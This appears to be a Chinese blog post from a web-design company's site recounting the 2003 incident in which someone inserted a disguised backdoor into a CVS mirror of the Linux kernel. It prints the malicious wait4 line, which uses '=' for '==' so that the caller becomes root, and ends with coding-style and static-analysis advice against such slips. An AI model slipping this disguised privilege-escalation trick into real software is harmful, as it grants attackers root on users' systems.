成人午夜视频全免费观看高清-秋霞福利视频一区二区三区-国产精品久久久久电影小说-亚洲不卡区三一区三区一区

如何在Linux中安插一個后門?

2021-02-25    分類: 網(wǎng)站建設(shè)

Linux內(nèi)核是開源的代碼,能不能向其中安插一個后門呢?這是一件難度很高的操作,但是有人卻差點兒成功了,我們來看看這是怎么回事。

時間回到2003年,當(dāng)時Linux內(nèi)核的代碼主倉庫保存在一個叫做BitKeeper的商業(yè)軟件中。如果想對Linux內(nèi)核代碼進(jìn)行修改的話,需要走一個審批流程,以此來確定這次更改能否被接受。每一次更改都有一個簡單的說明,其中包含一個指向?qū)徟涗浀逆溄印?/p>

但是有些人不喜歡BitKeeper(堂堂的Linux怎么能保存在閉源的商業(yè)軟件中??。?, 于是一個CVS(估計好多人都沒聽說過它了吧)被建立了起來,其中保存著從BitKeeper clone來的代碼, 這樣開發(fā)人員可以用開源的CVS來訪問Linux代碼。

2003年11月5號,Larry McVoy 注意到了一件怪事,CVS中的一個代碼變更沒有包含審批記錄的鏈接, 這是怎么回事?

經(jīng)過一番調(diào)查發(fā)現(xiàn):從來沒有人批準(zhǔn)過這個代碼變更,奇怪的是,這個代碼變更并沒有出現(xiàn)在BitKeeper主倉庫中,原來是有人黑進(jìn)了CVS的服務(wù)器,偷偷插入了一段代碼。這段代碼到底做了什么事情呢?

這段代碼修改了一個叫做wait4的Linux函數(shù),程序可以使用wait4來等待一些事情的發(fā)生,這個代碼變更增加了這么兩行:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL;

(代碼可左右滑動,懂得C語言的同學(xué)可以思考下,這段代碼有什么不尋常的?)

粗一看這段代碼,就會覺得這沒啥啊?不就是做一點條件檢查嗎,不滿足條件就返回錯誤。

但是仔細(xì)看看就會發(fā)現(xiàn)事情不對,第一行的最后, 有個"current->uid=0", 而不是 "current->uid == 0" 。

正常的寫法應(yīng)該是“==0”, 就是檢查當(dāng)前的用戶ID是不是0, 寫成“=0”就是把當(dāng)前用戶ID設(shè)置為0 , 而ID為0的用戶是"root" !

這就意味著,如果這段代碼被執(zhí)行,當(dāng)前用戶就會變成root,可以在系統(tǒng)中為所欲為!

這其實是個經(jīng)典的后門, 想象一個,一個黑客在Linux運(yùn)行了一個程序,這個程序調(diào)用了wait4, 然后這個黑客突然間具備了root權(quán)限!

這個后門可是真夠聰明的,偽裝成了條件檢查,試圖蒙混過關(guān),如果一直沒人發(fā)現(xiàn)會怎么樣呢?

首先,后門存在CVS中,不在BitKeeper的主倉庫中,從BitKeeper 代碼庫Build出的Linux肯定沒問題, 但是如果有人從CVS代碼庫中build了Linux, 那就中招了。

其次,搞破壞的家伙可能有這樣的預(yù)期:有個被Linus Torvalds所信任的內(nèi)核開發(fā)者,他討厭BitKeeper,并且在使用CVS, 那當(dāng)他修改了代碼,準(zhǔn)備通過郵件的方式向Linus Torvalds發(fā)送patch的時候發(fā)現(xiàn),咦,wait4這里也有個code change, 是做條件檢查的,也包括進(jìn)去吧。Linus收到補(bǔ)丁,一看是自己信任的兄弟提交的,沒有仔細(xì)檢查,于是后門代碼進(jìn)入了主代碼倉庫。

這當(dāng)然是猜測的場景,也算是一種社會工程學(xué)攻擊吧,不過Linux團(tuán)隊非常小心,把這個后門給揪了出來。

故事到這里就可以結(jié)束了,再就這個話題擴(kuò)展一下,多說兩句。

我記得剛工作的時候,有個同事給我說,在C語言中,當(dāng)需要和0比較的時候,可以把0放到前面,這么寫:

if( 0 == user_id){ ....... }

這樣即使把 == 寫成了 = , 編譯器就會發(fā)現(xiàn)錯誤。我當(dāng)時覺得挺古怪的,把一個數(shù)字放到前面,變量放到后面。后來習(xí)慣了,在Java 也經(jīng)常會這樣寫 if (null == user){ ...... }

其實現(xiàn)在的IDE都很智能了,像這種把==寫成=的情況,IDE就可以給出警告。即使沒有用IDE,如果對源碼做靜態(tài)的代碼分析,也會被抓出來的警告的。

Linux是開源的代碼,任何人,只要你愿意,都可以查看所有的代碼,這相當(dāng)于把Linux放到了陽光底下,無數(shù)雙眼睛都盯著看,這種透明度使得在其中安插一個后門是非常難的。

當(dāng)前名稱:如何在Linux中安插一個后門?
當(dāng)前路徑:http://jinyejixie.com/news/102846.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供品牌網(wǎng)站制作、網(wǎng)站設(shè)計全網(wǎng)營銷推廣、軟件開發(fā)網(wǎng)站內(nèi)鏈、關(guān)鍵詞優(yōu)化

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

小程序開發(fā)
自治县| 朝阳市| 明溪县| 鸡西市| 特克斯县| 来凤县| 丰县| 安陆市| 浏阳市| 丹巴县| 古丈县| 吉木乃县| 六安市| 滁州市| 宣恩县| 瑞昌市| 灵宝市| 张家口市| 夏邑县| 化德县| 五家渠市| 田东县| 婺源县| 黔南| 灌阳县| 溧水县| 陕西省| 胶州市| 白水县| 安图县| 招远市| 夏河县| 方山县| 吉水县| 浏阳市| 西乡县| 宁河县| 铜鼓县| 北流市| 徐闻县| 广宁县|